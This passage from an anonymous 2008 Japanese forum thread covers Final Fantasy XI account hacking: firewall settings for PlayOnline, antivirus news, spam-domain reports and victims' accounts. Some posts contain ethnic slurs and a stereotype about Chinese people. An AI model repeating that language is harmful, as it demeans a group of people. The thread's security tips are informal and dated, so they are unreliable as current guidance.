エクスプローラーでもどのプロセスから送るか分からない。

238 名前:既にその名前は使われています:2008/09/10(水) 18:14:38 ID:HDqreeXy
>>217
あれIEベースだけど大丈夫なのか?

239 名前:既にその名前は使われています:2008/09/10(水) 18:15:54 ID:5bleATyV
>>238
良く考えたら余計危ないか・・

240 名前:既にその名前は使われています:2008/09/10(水) 18:22:53 ID:v7BsPFSp
リネージュ アイテム封印サービス
ttp://lineage.plaync.jp/security/huuin.aspx
これちょっとおもしろい。
自分でアイテムにEx付ける感じ(捨てることもできなくなる)。
数日〜1週間(定期メンテまで)の時間稼ぎにしかならんけど。

241 名前:既にその名前は使われています:2008/09/10(水) 18:28:15 ID:5bleATyV
>>240
これ解除も出来るんじゃないのかね

242 名前:既にその名前は使われています:2008/09/10(水) 18:28:41 ID:qq0yJ2Em
>>240
週末プレイヤーとかは泣きそうだな。
でも今の巻き戻し一回だけ、の現状ではお間抜けさんにとっては最後の砦になるんじゃないか?

若しくはコレを盾に、対応しない代わりに巻き戻し回数増やさせるとかさ。
EQ2のメンター制を取り入れるぐらい柔軟性が出てきたし要望出しまくればやってくれるカモよ?

243 名前:既にその名前は使われています:2008/09/10(水) 18:31:16 ID:0qqdueuQ
なんかPOLでfgrfgrとかいうガルカからメッセが来てたんだが・・・
業者うぜぇぇぇ

244 名前:既にその名前は使われています:2008/09/10(水) 18:33:17 ID:mvuL1eml
つーか、WoWでやってるトークンを利用したワンタイムパスワードをFF11でも
入れるって話になってるよな。それさっさとやってくれれば、パスワード盗難は
ほぼありえなくなる。

物理的に家に泥棒が入ってトークンを盗まれる可能性は残るが。

245 名前:既にその名前は使われています:2008/09/10(水) 18:36:20 ID:AtjPKwBT
何で俺にはメッセージこないんだ?

246 名前:既にその名前は使われています:2008/09/10(水) 18:40:07 ID:F2ytF2Ov
>240
完美は1年半前に正式サービス開始と同時にそれ導入してたよ
アイテム課金で1個100円
ま、完美は運営の鯖がハックされて意味なかったけどねw

247 名前:既にその名前は使われています:2008/09/10(水) 19:22:20 ID:20xbD6x5
>>246
ついでに、完美の運営鯖ハック祭りのあと
そのアイテムは10円相当に引き下げられた


248 名前:既にその名前は使われています:2008/09/10(水) 19:37:50 ID:qq0yJ2Em
余計なスキャン省略、高速化を図った「ノートン2009」
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20814.html

パスワード詐取などの犯罪対策を強化した「ウイルスバスター 2009」
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20813.html

Kaspersky 2009シリーズ発表、検知エンジンを刷新して高速化
ttp://internet.watch.impress.co.jp/cda/news/2008/09/10/20818.html

249 名前:既にその名前は使われています:2008/09/10(水) 19:40:39 ID:wTUCoorm
テンプレ改定

■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
※injectionを使ってIEでもノートパッドでもエクスプローラーでもどのプロセスから送るか分からない
 ウィルスがいるため、POLをファイアウォール設定しても無意味になる可能性が高い。

250 名前:既にその名前は使われています:2008/09/10(水) 19:50:11 ID:DjGGVVPw
ノートンは、期限1ヶ月前になると毎日、契約の更新をしてくれって、
メッセイジを出すんだが、高確率でその時にPOLが落ちる。凄い嫌がらせで、
ストレスがマッハになる。ちなみにWin上から削除しても、バージョンアップの情報を
Net 上に 取りに行きます。まあ、安いソフトに買い換えました。
ハックされたら、引退しますし・・・・   ^^

251 名前:既にその名前は使われています:2008/09/10(水) 20:33:38 ID:xo3YcmtF
>>250
ハクられたら、オンラインゲーム(ジャンルを問わず)
を引退が精神衛生上一番いい。


252 名前:既にその名前は使われています:2008/09/10(水) 20:34:47 ID:TBgNt/oA
>>240は面白いな。
POL上から即ロック可能で、一週間は自分からもロック解除出来ないとかだと、
中華は気が狂ってお得意さんから殺されるだろうてwwwww
一般人なら一週間FF出来なくても何の問題もないし。
着替えとか文句言う廃人はこれを機会にゲーム止められればいいし〜

253 名前:既にその名前は使われています:2008/09/10(水) 20:37:06 ID:rGm3tcoK
引退とか言ってるのは巻き戻し恐れてる業者か?
盗品売るとかホント糞だな


254 名前:既にその名前は使われています:2008/09/10(水) 20:43:21 ID:z5+RagRS
そんなことよりウイルスバスター2009にしたら、IEにもFxにも変なツールバーが追加されたんだが?

255 名前:既にその名前は使われています:2008/09/10(水) 20:55:13 ID:9R0YN0YX
カスペこのまま発売か・・・

256 名前:既にその名前は使われています:2008/09/10(水) 21:08:50 ID:OMV7ATPV
>>180
なんかPOLで見えるオンラインフレリストにそのメアドがはいってしまった。
他と違って黒字で出てきてるんだけど…どうなんだこれ?
いまのところウイルスチェックにはかかってこんけど気になるな。

257 名前:既にその名前は使われています:2008/09/10(水) 21:14:42 ID:kkQM2u8o
たった今フレから>>219と同様のメッセが知らないやつからきたんだけどって相談があった
書かれているアドレスはwww●hugecheap●com

258 名前:既にその名前は使われています:2008/09/10(水) 21:16:32 ID:0qqdueuQ
>>245
俺も前は来なかったんだけど、最近大きな買い物を競売でやったせいかも。

259 名前:既にその名前は使われています:2008/09/10(水) 21:32:45 ID:K0KYS+0c
これからのネトゲはRMTに加えてハッキング問題が出てくるなw

260 名前:既にその名前は使われています:2008/09/10(水) 21:56:22 ID:wTUCoorm
IPアドレス 208●69.176.44
ホスト名 hugecheap●com
IPアドレス割当国 アメリカ合衆国 ( us )

Simpli Hosting, Inc SIMPLI-1 208●69.176.0 - 208●69.183.255
China Clastar VLAN-29 208●69.176.40 - 208●69.176.47

261 名前:既にその名前は使われています:2008/09/10(水) 22:13:33 ID:9R0YN0YX
クレジットカードの不正使用による損害に対し、年間 100万円を限度に補償が

262 名前:既にその名前は使われています:2008/09/10(水) 23:09:37 ID:CYFgzgAe


263 名前:既にその名前は使われています:2008/09/10(水) 23:54:48 ID:uBRXjTEd
ほしゅ

264 名前:既にその名前は使われています:2008/09/11(木) 00:26:17 ID:tcL4n8t8
>>250
>>251
死ねシナチク

265 名前:既にその名前は使われています:2008/09/11(木) 00:37:15 ID:vhL2YUaz
おやすみ前のあげ

266 名前:既にその名前は使われています:2008/09/11(木) 00:42:07 ID:bkJux1NC
まさか自分もアカハックされるとは・・・、2日前からおかしいいなと思ってたけど

267 名前:既にその名前は使われています:2008/09/11(木) 00:46:15 ID:VJ4pGtb8
>>250-251
中国狗?

268 名前:232:2008/09/11(木) 00:48:14 ID:cF7FX+mB
コンピュータ名、ユーザ名、IPアドレス、接続されたハードウェア等
アクセスしているPCを識別する情報はいくつもあるから、それらを組み合わせて記憶し、
たとえパスワードを盗まれてもアクセスできないように、
■指定された端末以外からはアクセスを禁止する
という設定ができればいいと思う。

その場合、識別情報を変更するときが問題になるが、
設定変更のためのパスワード発行依頼をするページを作り、
登録されているメールアドレスにそれが届くようにする。
パスワードじゃなくても、登録URLを記載してもいい。
インターネットのユーザー管理ではよく行われていることだよ。

269 名前:既にその名前は使われています:2008/09/11(木) 00:56:54 ID:cF7FX+mB
↑ちょっと方向性変わったが、いかなる方法でハックされても
同じ環境を作るのが難しいものをかんがえてみた。
ちなみに、データはしっかり暗号化してくれよ>■e

270 名前:既にその名前は使われています:2008/09/11(木) 00:58:08 ID:bkJux1NC
●今日の0時30分
●2ヶ月ほどインしてなくて日曜日に久々にインしただけ。ネットはアメーバブログや2ch、ニコニコ、他
●他人が貴方のIDを使用したことが一度でもあるか No
●ID・Passの認証方法 ずっとPOLに保存/自動ログイン
●Pass変更の履歴 したことない
●他人が貴方のPCを使う可能性の有無 自分オンリー
●ツールの使用の有無: なし
●ネットカフェの利用の有無: No
●使っているOS Win XP SP2 4日前にSP3に変えた。
●使用ブラウザ 火狐3 時々IE7 
●WindowsUpdateの有無 毎月小まめにUPしてた。
●FlashPlayerとRealPlayerのバージョン 最新だと思う。
●アンチウイルスソフト Avaist
●その他のSecurty対策 なし
●ウイルススキャン結果 spybotで4匹削除
●スレログやテンプレを読んだか 日曜日読んでspybot入れた polからFF11に移行する時必ず落ちるのでおかしいと思ってた。
Vupの不具合かと思ったが念のため、HDD入れ替えてOSインストしてPOL立ち上げたらいつものIDが無効に成ってた;;

今から解約中のもう1アカで事情説明してくる

271 名前:既にその名前は使われています:2008/09/11(木) 01:04:01 ID:j680cTnq
> 最新だと思う。

バージョンを確かめてみましたか?

272 名前:既にその名前は使われています:2008/09/11(木) 01:48:40 ID:Lh4I3yVK
>>270
・Spybotで検出された4つのウィルスの名前はなんでしょうか?
・FirefoxはFirefox3ですか?
・NoScriptは入れてましたか?

>>268-269
パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、
そんなことをしても意味は全くない。
それよりWoWのAuthenticatorと同様なものを入れる計画があるからそれが入ればOK。


273 名前:既にその名前は使われています:2008/09/11(木) 01:51:06 ID:G8I8Q8+3
>>268
普段とプロバイダが違うとアクセス不可でいいよ、もう。

274 名前:272:2008/09/11(木) 01:55:16 ID:Lh4I3yVK
嘘を言ってしまったかもしれないので自己レス

> パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、
> そんなことをしても意味は全くない。

同じ環境を作る必要はなくて認証の際にこの情報を詐称できる、と思うけど
もし詐称不可能な情報を作ることが可能なら意味はありますね。

Authenticatorの方がお手軽かつセキュリティ強度も高いけど。

275 名前:既にその名前は使われています:2008/09/11(木) 01:57:48 ID:Rs7EDT7N
> 最新だと思う。
いっつもコレが引っかかってるパターンなんだよな

276 名前:既にその名前は使われています:2008/09/11(木) 01:58:57 ID:Lh4I3yVK
>>273
どのプロバイダに接続していることは簡単に認識可能だし、
中国からVPNを使ってそのプロバイダ経由でアクセスすることも簡単。

つーか中国からのアクセスを既に遮断しているのに、アカハックが
続いているってことは、現時点でSoftetherのようなVPN経由で
日本のプロバイダを通してアクセスしているはず。

マイナーなプロバイダに入ってる人は多少守られるかもしれないけど
わりと微妙な嫌がらせにしかならない。

277 名前:既にその名前は使われています:2008/09/11(木) 02:29:40 ID:1ZBre3UU
>>271
HDD入れ替えましたので、今はバージョンの確認取れないです。
>>272
名前までは・・とにかく削除しました。
FirefoxはFirefox3です
NoScriptは入れてません、今は怖いので入れています。

GMにメールしました。不正アクセスの確認が取れたので、アカウントのログイン停止中とのこと。
明日不正アクセス専門チャットで詳しい被害聴いてきます・・

278 名前:既にその名前は使われています:2008/09/11(木) 02:30:09 ID:HQ2VK7C2
日本国内にも中国人が多数居る訳だから、
垢ハック対策で中国「から」のアクセス遮断しても無意味でしょ。


279 名前:既にその名前は使われています:2008/09/11(木) 02:38:35 ID:dtazaj62
>>278 業者のネガキャン乙。
日本国内なら法で裁けると何度言われたら(ry

テンプレに無いみたいだから、いちおFlashPlayerのバージョンテストページのアドレス置いとくねー。
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

280 名前:既にその名前は使われています:2008/09/11(木) 03:07:13 ID:p+N5/k40
>>279
テンプレサイトにあります
そっちを見ていただければじゅうぶん

281 名前:既にその名前は使われています:2008/09/11(木) 03:20:08 ID:p+N5/k40
スクエニからニュースレターが来てた
5年FFにいて初めて来たんだけどこれ・・・

テキストでしか受け取れない仕様にしてるからどんなリンクが
張られてるのかわからないけど、大丈夫なものかどうか・・・

282 名前:既にその名前は使われています:2008/09/11(木) 03:21:59 ID:Rs7EDT7N
ニュースレターは3月のBAのときとかも来てたよ

283 名前:既にその名前は使われています:2008/09/11(木) 03:24:41 ID:p+N5/k40
>>282
ありがとうございますm(_ _)m
時期が時期だけに、ちょっと過敏になりすぎてる

284 名前:既にその名前は使われています:2008/09/11(木) 04:25:25 ID:5xYM1Hf3
NoScriptいれてないFireFoxになんの意味が・・・

285 名前:既にその名前は使われています:2008/09/11(木) 04:51:48 ID:5i89qXwP
>>278.279
遮断する意味はある
遮断すれば遮断したぶんのこうかはある
完璧ではないし、遮断することは本来普通の対応じゃないか?

>>284
色んな意味でちょっと敏感になりすぎ
大きな事故がありそうな、最近そんな気がしている。

286 名前:既にその名前は使われています:2008/09/11(木) 06:31:27 ID:caW3dXW+
age

287 名前:既にその名前は使われています:2008/09/11(木) 08:09:29 ID:K/X7cBjW
深夜数時間Vanamon繋がらなかったけどまた何か改ざんされてんだろか。

288 名前:既にその名前は使われています:2008/09/11(木) 08:30:06 ID:OsiGRecJ
1年ぶりに復帰しようとしたら
IDかパスが違うと言われて
POLにログインできなくなってたんだけどやられたかな?
他の心当たりとしては去年行われたセキュリテイ強化の際
パスを変更せず5桁のまま放置したことです

289 名前:既にその名前は使われています:2008/09/11(木) 08:38:20 ID:FcDVHQTI
ヴァナモンをソースチェッカーで調べてみたが、問題は無かったな
油断しないに越したことは無いが

290 名前:既にその名前は使われています:2008/09/11(木) 10:35:28 ID:m4an2tNo
age

291 名前:既にその名前は使われています:2008/09/11(木) 11:27:18 ID:XFMRxvvi
さがってきた

292 名前:既にその名前は使われています:2008/09/11(木) 11:27:48 ID:45qtTbJq
>>288
とりあえずウイルスチェックやソフトの更新確認を

293 名前:既にその名前は使われています:2008/09/11(木) 11:30:47 ID:XEqKrORb
保守ついでの質問
俺は半年間ログインしていないんだが(カード決算・自動ログイン)
たとえウィルスに感染していたとしても、ログインしなきゃ抜かれることはないのだろうか?


294 名前:既にその名前は使われています:2008/09/11(木) 11:35:38 ID:i61RPvcE
すでに抜かれていなければ大丈夫なんじゃない
PS2か箱でログイン出来るか試してみるのが良い

295 名前:既にその名前は使われています:2008/09/11(木) 11:36:14 ID:Q7izZchq
それに答えられるやつはいない

296 名前:既にその名前は使われています:2008/09/11(木) 11:46:58 ID:9zOKc/RD
FFXIに限ればログイン時かログイン後に抜くのが普通だから
ログインしなけりゃ抜かれる可能性は低いだろうな

・引退前に抜かれてた
・弱いパスワードを使ってた
・他のサービス(ゲーム)と同じパスワードを使ってた
・実はログインしてた

復帰したら垢ハックされてた奴は大抵このパターンのどれか

297 名前:既にその名前は使われています:2008/09/11(木) 12:02:28 ID:7JlXYsuA
アカハックされた奴はPOLのメールパスも抜かれてるから注意な

298 名前:既にその名前は使われています:2008/09/11(木) 12:11:17 ID:XEqKrORb
げ、今ログインしちまったwww>PC
リアルプレイヤー今現在使用中なんだが、消さんとやばいんか
なんだかちょっと入らない間にいろんなことが・・・浦島状態だわw



299 名前:既にその名前は使われています:2008/09/11(木) 13:33:51 ID:xuzNbxr8
>>298
ログイン時に変な挙動起きてない?
おきなかったら多分大丈夫だと思う。
私も同じようにPCからの起動は(ウイルス騒動があってから)してないけど、
PS2から起動して半年、まだ取られて無い。

300 名前:既にその名前は使われています:2008/09/11(木) 13:38:17 ID:xuzNbxr8
>>287
繋がらないなら向こうの鯖がメンテだっただけじゃない?
もしくはすでに自分のPCが(ヴァナモンに入る前から)ハック受けてる場合もあるけど。

301 名前:既にその名前は使われています:2008/09/11(木) 13:48:32 ID:j680cTnq
閲覧数が多いとテンポったりするよね、ヴァナモン

302 名前:既にその名前は使われています:2008/09/11(木) 15:32:46 ID:ARnf7grN
age

303 名前:既にその名前は使われています:2008/09/11(木) 15:52:42 ID:s5ocxpYk
>>288
今はパスは7桁以上でないとダメになってる。
サポセンが仮パスだしてるのかも、聞いてみそ。

304 名前:既にその名前は使われています:2008/09/11(木) 16:55:08 ID:PdV0Qmi8
今インしようとしたら、パスワードかIDが違いますと言われ(3回)
不正アクセスチャットに新しいID教えてもらって入ったけど
何も変わってなかった、これって後で入ろうとしてパス変えたのかな?


305 名前:既にその名前は使われています:2008/09/11(木) 17:03:47 ID:PTBgsPCV
おい待て まさかとは思うが何の対策もせずに入ったのか?
だとしたら極上の馬鹿だが・・・  まさかな


>>2のテンプレよろ

306 名前:既にその名前は使われています:2008/09/11(木) 17:04:51 ID:4ZctM1eJ
>>304
とりあえずハックして即パス変えたが
キャラ資産見たら微妙だったので
高額アイテムがある垢を先にやって暇な時にでも取るか
という感じかもしれん


307 名前:既にその名前は使われています:2008/09/11(木) 17:13:19 ID:i61RPvcE
>>306
想像して噴いたw
俺のも何も取られていなかったけど気味が悪かったんで課金停止してウェブマネに変更した
ところで業者ってパス抜いて課金停止されている垢だったらわざわざ課金するもんなの?

308 名前:既にその名前は使われています:2008/09/11(木) 17:18:34 ID:Eeg7wxJ9
新しいID教えてもらえる時代になったのかw

309 名前:既にその名前は使われています:2008/09/11(木) 17:19:21 ID:PdV0Qmi8
なんかどうでも良くなったからそのままインした。
>>306
>>306
そっか納得^^

310 名前:既にその名前は使われています:2008/09/11(木) 17:22:39 ID:+/20YCgs
>>307
するんじゃね
大金持ったままフェードアウトした連中もいるんだろうし
なにもなかったらそのまま寝釣りに利用する手もある

311 名前:既にその名前は使われています:2008/09/11(木) 17:43:21 ID:zmOEx7Pk
>>306
【FF11】垢ハク復旧頼んでみたが【垢ハク】
ttp://www.23ch.info/test/read.cgi/ogame/1220247286/

こういうハックされたけどスルー→その後高額アイテム持ってたら奪取
って例もあるみたいだから気をつけてな

312 名前:既にその名前は使われています:2008/09/11(木) 17:49:23 ID:99TNnVHj
>>258
あ、なるほど・・・。
自分も今まで来なかったけど、最近高額アイテムを買ったわ。

313 名前:既にその名前は使われています:2008/09/11(木) 17:52:57 ID:99TNnVHj
>>307
ニコニコでハックされた人の動画が出てたけど、課金停止してたのに
課金されてアイテムをとられたらしいよ。

314 名前:既にその名前は使われています:2008/09/11(木) 17:55:01 ID:+/20YCgs
ペンギン村の住人だけど
不正アクセスの調査依頼で免許証コピー送ったら
なんとか本人確認とってもらえたよ

ナメック星人とかの人朗報

315 名前:既にその名前は使われています:2008/09/11(木) 17:55:54 ID:+/20YCgs
ほんとかよって声があればメール貼るぜ

316 名前:既にその名前は使われています:2008/09/11(木) 18:21:56 ID:5v4Z3jdk
ちょびっと興味深い話し

ttp://blog.livedoor.jp/yoshy2k7/archives/51205984.html
417.カード不正利用
私のクレジットカードが他人に不正利用された。
夜中にカード会社から電話がかかってきた。
【会社】 ゲームに使うためネットでカード番号を入力したか?
・・・
【会社】 ランダムにカード番号を入力して一致したものを使っているようだ。

317 名前:既にその名前は使われています:2008/09/11(木) 20:23:04 ID:bFHLNMYn
266からあげ

318 名前:既にその名前は使われています:2008/09/11(木) 21:23:25 ID:Ha8stJ0P
229からあげ

319 名前:既にその名前は使われています:2008/09/11(木) 21:49:48 ID:+/20YCgs
パス再発行でインしたら
英語でPOLGM呼んだあとっぽいメッセージが
大量に残ってた
凍結解除しようとしてあれこれ試したのかな

320 名前:既にその名前は使われています:2008/09/11(木) 22:06:41 ID:j680cTnq
外人にアカウント売られていたんじゃないかと勝手な予想

321 名前:既にその名前は使われています:2008/09/11(木) 22:20:49 ID:+/20YCgs
たしかに英語圏のやつぽかったなー
メイン垢でtellしたとき

322 名前:既にその名前は使われています:2008/09/11(木) 22:43:46 ID:EpeQPks0
>>313
ベジータ王子の動画結構好きだったから、かわいそうだわ。
でもウイルス対策とかもしてなかったみたいだし油断しすぎだわw

323 名前:既にその名前は使われています:2008/09/11(木) 23:03:16 ID:99TNnVHj
>>322
自分も好きw
でもウィルス対策はしないといかんよな。
自分が発信源になることもあるわけだから、自分一人の問題じゃない。

324 名前:既にその名前は使われています:2008/09/12(金) 00:40:49 ID:MQYhm9PP
251からあげ

325 名前:既にその名前は使われています:2008/09/12(金) 00:44:00 ID:3aUk2teY
>>314
免許証送ったなら向こうでなんとかできるからな。
IPから日本かどうか、IP管理者から実在する人間かどうか確認出来る。

中華だと、名前は偽者を名乗るのが文化だとかぬかす人種だから、カットしやすいしなー

326 名前:既にその名前は使われています:2008/09/12(金) 00:58:17 ID:9yQHNikc
かちゅの板更新に、いつもhimajin氏のサイトから更新ファイルを落として
使わせてもらってるけど、サイトxreaだったのね。
tp://hima2908●s151●xrea●com/
ここだけど、素人なりにチェックしてみたけど大丈夫だよね?
インラインでamazonがいくつかあるけど。
と言ってもブックマークから操作ミスって既に飛んじゃって、すぐ戻ったけど
ヤバかったら意味無いか・・・

327 名前:既にその名前は使われています:2008/09/12(金) 01:02:50 ID:7LiaMaq/
>>326
俺もざっとみただけだけど改竄とかはされてなさそうだから大丈夫だとは思う

328 名前:既にその名前は使われています:2008/09/12(金) 01:05:17 ID:bB0R8IyJ
お休みまえのあげ。

329 名前:既にその名前は使われています:2008/09/12(金) 02:04:08 ID:jQaHkKit
age

330 名前:既にその名前は使われています:2008/09/12(金) 03:31:40 ID:QkwajA+Y
俺PS2だけどageといてやるよ
おやすみ

331 名前:既にその名前は使われています:2008/09/12(金) 06:21:53 ID:jQaHkKit
age

332 名前:既にその名前は使われています:2008/09/12(金) 08:24:35 ID:Iho4geVS
COMODO導入したのですが、Norton360のファイアーウォールOFFは当然しますよね
でもあの赤い警告がそわそわしちゃうので、ONにしてみました。
今のところ競合したりとか、異常な動作は視覚的に現れてませんが、そのまま使い続けていいと思いますか?
ご意見をお願いします。

333 名前:既にその名前は使われています:2008/09/12(金) 08:30:16 ID:UX8T04K+
せめて質問する時は上げないとw 293で維持させちゃダメ!まぁ私は答えられないんですけどね;;

334 名前:既にその名前は使われています:2008/09/12(金) 10:04:06 ID:1XGBijbv
>>332
致命的

335 名前:既にその名前は使われています:2008/09/12(金) 10:09:18 ID:rbwpXCR4
>>332
そういうのが判断できないうちはCfpはお勧めしないよ。
Cfpはセキュリティレベル設定によって超甘いか超五月蝿いか割りと両極端なアラート出してくるからね。
それを自分の環境に合わせて設定することによって初めてCfpは堅いですね。ってことになるわけで。

インスコのときに他のと同時に使ったりすると不具合でるかもよ?って言われたしょ。
そういうことです。

336 名前:既にその名前は使われています:2008/09/12(金) 10:50:40 ID:myX8b7c7
こんなのまで出始めてるから注意

マルウェア配布が目的:YouTubeの偽サイトを作るアプリ出現
http://www.itmedia.co.jp/enterprise/articles/0809/12/news021.html

337 名前:既にその名前は使われています:2008/09/12(金) 10:55:51 ID:4nCryUol
こんなのまでツールキットになってんのかw
手抜きもいいとこだな。

>Flash Plyayer


338 名前:332:2008/09/12(金) 11:31:21 ID:Iho4geVS
COMODOまとめサイトに書かれてる手順とセキュリティレベル設定以上の高度なことはまだできないなぁ
Excite翻訳しながら、設定していくのはなかなか骨が折れる。
しかしFFしてるとIPごと、ポートごとに設定できて、強固なのはなんとなくわかる

339 名前:既にその名前は使われています:2008/09/12(金) 13:07:06 ID:8xJA9wPb
勝手にフレ登録が増えてたw
外人に売ったのかなw

340 名前:既にその名前は使われています:2008/09/12(金) 13:07:11 ID:36U0corC
age

341 名前:既にその名前は使われています:2008/09/12(金) 13:10:33 ID:bBQO6Ttz
http://gigazine.net/index.php?/news/comments/20080912_windows_7/
マイクロソフト、最新OS「Windows 7」のベータ版を年内に提供か

セキュリティ面向上するといいな

342 名前:既にその名前は使われています:2008/09/12(金) 13:11:20 ID:4p2ynmLS
>>336
>出来上がったページは本物のYouTubeそっくりのデザインで、
>例えば「Flash Plyayerの最新版が必要です」などのメッセージを表示してユーザーをだまし、
>プラグインをインストールするように偽装しながらマルウェアに感染させることができるという。

もしNoscriptの警告に偽装されてたらうっかり押しちゃうかもしれない
怖いな

343 名前:既にその名前は使われています:2008/09/12(金) 13:13:51 ID:wS4e0PtR
>>341
Vistaベースだからな

 管理者権限の上、超管理者権限が実装。
 ファイルを削除します。宜しいですか?
 あなたは管理者ですか?
 ファイルを削除します。本当に宜しいですか?
 本当の本当の本当によろしいですか?
 削除したら元に戻せないかもしれませんが、いいんですね?

 ファイルをごみ箱に移動しました。


とかいうセキュリティ強化をやってくるかもしれんな。


344 名前:既にその名前は使われています:2008/09/12(金) 14:38:37 ID:qiw6A5vO
>>343
垢ハックが怖いからVistaに戻したんだがwindowsの起動に5分とかシャレにならん

345 名前:既にその名前は使われています:2008/09/12(金) 15:34:13 ID:0AXG+Wk9
アカハックがこんなに蔓延してるのに
スクエニときたらファイナルファンタジーXIを推奨PCでプレイしよう
っていうメールを送りつけてきた件について。

346 名前:既にその名前は使われています:2008/09/12(金) 15:50:00 ID:wS4e0PtR
>>345
FF推奨PCが売れる=スクエニすごい!と店に喜んでもらえる、だな。

347 名前:既にその名前は使われています:2008/09/12(金) 16:00:19 ID:elOTXlfA
>>345
このスレ的な解釈をすると
「FF専用のPCを用意してね!」
ってことだと思う(´・ω・`)

348 名前:既にその名前は使われています:2008/09/12(金) 16:19:37 ID:qiw6A5vO
むしろ■が専用機用意すりゃいいんじゃね

349 名前:既にその名前は使われています:2008/09/12(金) 18:03:38 ID:ctRROkpk
ノートンの新しいやつはカスペの様に垢ハックウィルスに全て対応したんかな?

350 名前:既にその名前は使われています:2008/09/12(金) 18:07:53 ID:w8fbYgAb
>>345
そのFF推奨PCで垢ハックされて引退したんだが・・・

351 名前:既にその名前は使われています:2008/09/12(金) 18:13:23 ID:m27nO+Gl
スレ読んでると、カスペと仮想環境の普及率高いような錯覚に落ちるw
>>349
カスペがすべて対応しているとは初耳。というかその誤解が怖いw
>>350
スペックとセキュリティは別物ですよ。


352 名前:既にその名前は使われています:2008/09/12(金) 18:21:00 ID:oCiXY7yb
>>350
■e>FF推奨PCでFF以外のことをやるな

353 名前:既にその名前は使われています:2008/09/12(金) 18:49:43 ID:x5dFcNCB
昔のワープロ専用機みたいな、FFを専用機を■が販売するとかw
High5000ぐらいの性能でいいなら、いまなら4,5万あればおつり来るよね?

354 名前:既にその名前は使われています:2008/09/12(金) 19:13:32 ID:zTMuUFTl
もしかしてPS2ってFF専用機に最適なんじゃね?

355 名前:既にその名前は使われています:2008/09/12(金) 19:14:09 ID:rZ+wnkVp
いまごろかよ

356 名前:既にその名前は使われています:2008/09/12(金) 19:15:42 ID:dFgx+tOc
PS2は画面がもう少し広ければ良かったんですけどね・・・・

357 名前:既にその名前は使われています:2008/09/12(金) 19:42:01 ID:x2kDK6fK
>>356
画像ってPCに取り込めると思ったけど
どこかで読んだ気がするんだけど違ったかな

358 名前:既にその名前は使われています:2008/09/12(金) 19:42:47 ID:Ebh+eCiA
買う人間が馬鹿だからだろ?
お水系馬鹿が元ヤンりようしwにせがまれてメールできた物をブランド感覚で買いまくり。
そして気に入らなければポイ。
それを実働でしている■もカス会社としか言いようが無いがな。

359 名前:既にその名前は使われています:2008/09/12(金) 19:55:55 ID:x2kDK6fK
>>358
日本語でおk

360 名前:既にその名前は使われています:2008/09/12(金) 20:10:16 ID:OynP6vdc
ヤベ ホントにわかんねぇんだけど・・・
解説プリーズ

361 名前:既にその名前は使われています:2008/09/12(金) 20:11:58 ID:aON4awQd
>>354
PS2はもう少しで終わるんじゃなかった?
今PC使っているならすぐ戻ってくるわけだし×箱かPCセキュリティ強化がいいと


362 名前:既にその名前は使われています:2008/09/12(金) 21:52:33 ID:nfW0g89O
ほしゅ

363 名前:既にその名前は使われています:2008/09/12(金) 21:58:09 ID:v0fCe7WV
>>361
出来ればPS3専用クライアント出して欲しけれど
箱○でのラインナップみると絶望的だよな・・・FF13シリーズで
成功して翻意してくれると良いのだけれど・・・

まぁ最悪箱○に力入れて快適に動く様になったら箱○に移るけれどw

364 名前:既にその名前は使われています:2008/09/12(金) 23:06:33 ID:3aUk2teY
>>363
喧嘩売る訳じゃないけど…どう絶望的だと思った?

確かに今箱〇じゃ、日本人が好みそうなゲーム作られては無いけど。
これは、海外向けに出した方が、カス当たりでも最低10万は保証されてるからなんだよねー
だから、多分貴女が抱いている今後発売されると思ってるゲームは今後一生発売されない可能性もあるんだけど…

一応それを踏まえた上で、どう絶望的か聞かせて欲しい。

365 名前:既にその名前は使われています:2008/09/12(金) 23:11:41 ID:5MuBSByb
>>363
箱○はアメリカ人向けのを、無理やり日本人向けに
したようなもんだから
PSシリーズと比べるのはどうかと思うがw


366 名前:既にその名前は使われています:2008/09/12(金) 23:26:05 ID:17bPOMtW
かなり初歩的な意味が判らない;

「PS3で出して欲しいけど
箱○で出ているゲーム各々を見てみると
それは絶望的だ」

って事なんだね?
箱○のゲームを見て…ってあたりの事情がよく判らない;

367 名前:既にその名前は使われています:2008/09/12(金) 23:31:17 ID:HLDif1KB
PS3でできるFFXI出して欲しい。
X箱360のほうはやりたいゲームでてないし。
ということだとおもわれ。

X箱360は中国の工場で故障率バツ牛ンらしいし。

368 名前:既にその名前は使われています:2008/09/12(金) 23:42:24 ID:17bPOMtW
なるほど

外人で垢ハック対策でPCから×箱に乗り換えた人物も居ると
このスレで見たことがあるけど
そうは行かない人も多いだろうな(自分もそうだし

すると今度はその後どうして
喧嘩を売られてるのか判らないな

「海外向けに出した方が売れるからなんだよ〜
だから×箱で目ぼしいタイトルが出る可能性は
薄いんだよね〜
で、なんで絶望的なの?」

って言ってるんだよね?
どゆこと?

369 名前:既にその名前は使われています:2008/09/13(土) 00:26:00 ID:fNmU3CKT
おやすみまえのあげ。

370 名前:既にその名前は使われています:2008/09/13(土) 00:29:14 ID:dgWR6L9Z
■eのラインナップがPS3より箱優先(FF13の件もあったしの)に映るから
このままの路線だとPS3版が開発されるのは絶望的に思える ってことじゃないのかい

371 名前:既にその名前は使われています:2008/09/13(土) 00:33:50 ID:an3zT+oK
>>370
次世代MMOをPS3で開発中なんだろね。
